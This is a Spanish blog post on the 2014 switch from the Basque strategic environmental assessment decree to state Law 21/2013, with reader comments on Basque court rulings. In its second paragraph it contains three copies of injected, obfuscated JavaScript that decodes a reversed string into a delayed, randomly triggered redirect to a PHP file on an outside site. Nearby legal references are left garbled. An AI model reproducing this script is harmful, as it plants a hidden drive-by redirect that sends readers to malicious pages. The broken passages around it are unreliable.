Evaluación ambiental: Cambio normativo

Desde hoy, el to 211/2012 de Evaluación Ambiental Estratégica, que vino a poner cierto orden en la evaluación ambiental del planeamiento urbanístico en el País Vasco, ha sido sustituido por la normativa estatal.

La $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/2003/09/0304936a.pdf” target=”_blank”>Decreto 183/2003, de 22 de julio, por el que se regula el procedimiento de evaluación conjunta de impacto ambiental (DECIA), y se remitió a él al tratar la evaluación de los planes ($NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to Vasco) 2/2006 de Suelo y Urbanismo” href=”https://www.boe.es/buscar/act.php?id=BOE-A-2011-17400#a90″ target=”_blank”>90.4, $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to Vasco) 2/2006 de Suelo y Urbanismo” href=”https://www.boe.es/buscar/act.php?id=BOE-A-2011-17400#a97″ target=”_blank”>97.1 LvSU).

La falta de sincronización con la Ley 9/2006, de 28 de abril, sobre evaluación de los efectos de determinados planes y programas en el medio ambiente generó algunas incoherencias, que vino a paliar la tos/2009_1circular.pdf” target=”_blank”>Circular 1/2009 de la Cotpv.

El  to (Gobierno Vasco) 211/2012 por el que se regula el procedimiento de evaluación ambiental estratégica de planes y programas (DvEAE) estableció, aunque sin evitar algunas fisuras, la regulación de la evaluación ambiental de los planes urbanísticos.

El BOE de 11/12/2013 publicó la Ley 21/2013, de 9 de diciembre, de evaluación ambiental (LEA) de carácter básico en su mayor parte (DF8 LEA). Su Disposición Final undécima dispone la necesidad de adaptación de la normativa autonómica y prevé que, en el caso de que no se produjera esta adaptación, las disposiciones de carácter básico de la LEA serían de aplicación a partir del año desde la entrada en vigor de la LEA.

Como la CAPV no ha procedido a la adaptación, desde hoy no se aplica el to de evaluación ambiental estratégica de planes y programas” href=”https://www.euskadi.net/r48-bopv2/es/bopv2/datos/2012/11/1205082a.pdf” target=”_blank”>DvEAE, sino la LEA.

Desde hoy tenemos que actualizar la terminología y ya no deberíamos hablar de Memoria Ambiental, de Informe de Sostenibilidad Ambiental (ISA), de Documento de Referencia o de Documento de Inicio, sino de Declaración Ambiental Estratégica o, en su caso, Informe Ambiental Estratégico, de Estudio Ambiental Estratégico, de Documento de Alcance y de Solicitud de Inicio. Dicen que es para simplificarnos las cosas (mediante la asimilación a la terminología de la evaluación de impacto ambiental) pero empiezo a creer que tanto cambio semántico tiene que obedecer a alguna intención inconfesable; en mi caso, por lo menos, están consiguiendo que mi memoria se parezca cada vez más a la batería de un teléfono móvil viejo.

Me he preparado una chuleta para tenerla en la mesa, como los médicos mayores con los nombres de los medicamentos. La comparto con vosotros por si os pasara lo mismo que a mí.

Tabla_EAE

La aplicación de la LEA no es íntegra porque tan solo se aplican los preceptos de carácter básico (p. ej., la mayor parte de los plazos no son básicos, DF8.2.b LEA), con lo que no sólo tendremos que gestionar el cambio sino que tenemos combinar la LEA con el to de evaluación ambiental estratégica de planes y programas” href=”https://www.euskadi.net/r48-bopv2/es/bopv2/datos/2012/11/1205082a.pdf” target=”_blank”>DvEAE: otro sudoku combinatorio de normas no pensadas para ser combinadas (deben pensar que estamos ociosos).

La nueva regulación no se aplica a los procedimientos de evaluación ambiental ya iniciados (DT1 LEA).

Ya volveremos sobre el contenido de la LEA. Hoy comentamos un tema que puede ser interesante: el carácter vinculante de la Memoria Ambiental, digo, de la Declaración Ambiental Estratégica.

El to de evaluación ambiental estratégica de planes y programas” href=”https://www.euskadi.net/r48-bopv2/es/bopv2/datos/2012/11/1205082a.pdf#page=12″ target=”_blank”>art. 13.6 DvEAE decía: «La memoria ambiental es preceptiva. La resolución administrativa por la que se apruebe definitivamente el plan o, en su caso, el acuerdo o la norma legal que dicte dicha aprobación, deberá motivar la decisión adoptada cuando la misma discrepe del contenido de la memoria ambiental», lo que tenía un encaje, cuando menos, curioso con el carácter vinculante atribuido al informe de la Cotpv sobre este aspecto por el El, desde hoy vigente en la CAPV, art. 25.2 LEA establece que «La declaración ambiental estratégica tendrá la naturaleza de informe preceptivo, determinante y contendrá una exposición… así como de las determinaciones, medidas o condiciones finales que deban incorporarse en el plan o programa que finalmente se apruebe o adopte».

Interesante, ¿verdad?

The following two tabs change content below.

Natxo Tejerina

Licenciado en Derecho (Deusto, 1979). Abogado (Bilbao, 1980-1991), Profesor en los cursos de urbanismo del IVAP (1995-2020). Funcionario en diversos ayuntamientos desde 1991, actualmente en Urbanismo del Ayuntamiento de Barakaldo en periodo sabático.

3 pensamientos en “Evaluación ambiental: Cambio normativo

  1. juan argudin gonzalez

    Natxo, muchas gracias por compartir tu chuleta. Me identifico con tu cometario de pérdida de memoria a modo de “móvil”.
    Aquí, en Asturias, a falta de ver la luz un Decreto autonómico al respecto (se está redactando), la Administración urbanística se debate en algo que no acabo de comprender. Me refiero a la asimilación del término “modificaciones menores” a todo tipo de modificación puntual de planeamiento. Dicho en otras palabras, se está por la necesariedad de la correspondiente Declaración Ambiental Estratégica (normalmente la simplificada) para cualquier modificación del planeamiento general o de desarrollo.
    Me temo que el debate es provocado más por cuestiones semánticas de la Ley que de la ponderación en la interpretación de término.
    Creo que la cuestión quedará zanjada con la norma autonómica, pero, de momento, la incertidumbre cada vez que presentas una modificación (aunque sea para variar la normativa sobre voladizos), está servida.
    Que tratamiento dais vosotros a este asunto?
    Un saludo,
    Juan Argudín.

    1. Natxo Tejerina

      Hola Juan.

      Mi experiencia es que si, que con una autoridad ambiental razonable y hablándolo, tanto las Modificaciones menores como las Zonas de extensión reducida posibilitan racionalizar este ‘coco’ de la Evaluación Ambiental Estratégica.

      Sin embargo el problema puede venir con la judicialización de la cuestión, que pone los pelos de punta. Y voy a referirme a dos Sentencias del Tribunal Superior de Justicia del Pais Vasco sobre ambos aspectos.

      • La primera se refiere a una modificación no solo menor sino ambientalmente indiferente: se anula la modificación porque en los aspectos no modificados había materia. La materia no es otra que en informe cautelar encargado por el Ayuntamiento se apuntaba un posible humedal no inventariado, pero que, insisto, nada tenía que ver con la modificación (Roj STSJ PV 3457/2003).
      • La segunda se refiere a una modificación con incremento de edificabilidad de una parcela en el centro que para cumplir el estándar de sistema general de zonas verdes reclasifica suelo No Urbanizable (podríamos hablar de zona de extensión reducida) sin prever una alteración del destino del suelo y sin que se alegara esto: Se anula la modificación por falta de Evaluación Ambiental (Roj STSJ PV 2410/2011, FJ7).

      Tengo la sensación que nos esforzamos en exceso en ahorrar esfuerzos en este tema (otra de las resistencias al cambio), cuando lo que deberíamos hacer es tratar de incorporarlo a los procesos de planeamiento para que no sea una carga sino una oportunidad para hacer mejores planes y que cuanto más nos resistamos, peor nos va a ir. Ya se que en el otro lado hay mucho talibán, pero siendo como somos “los nuestros”, es natural su radicalización. En definitiva creo que tenemos que cambiarnos de lado (le llaman entrismo, no?) y que hay mucho recorrido para mejorar la planificación urbanística.

Leave a Reply

Your email address will not be published.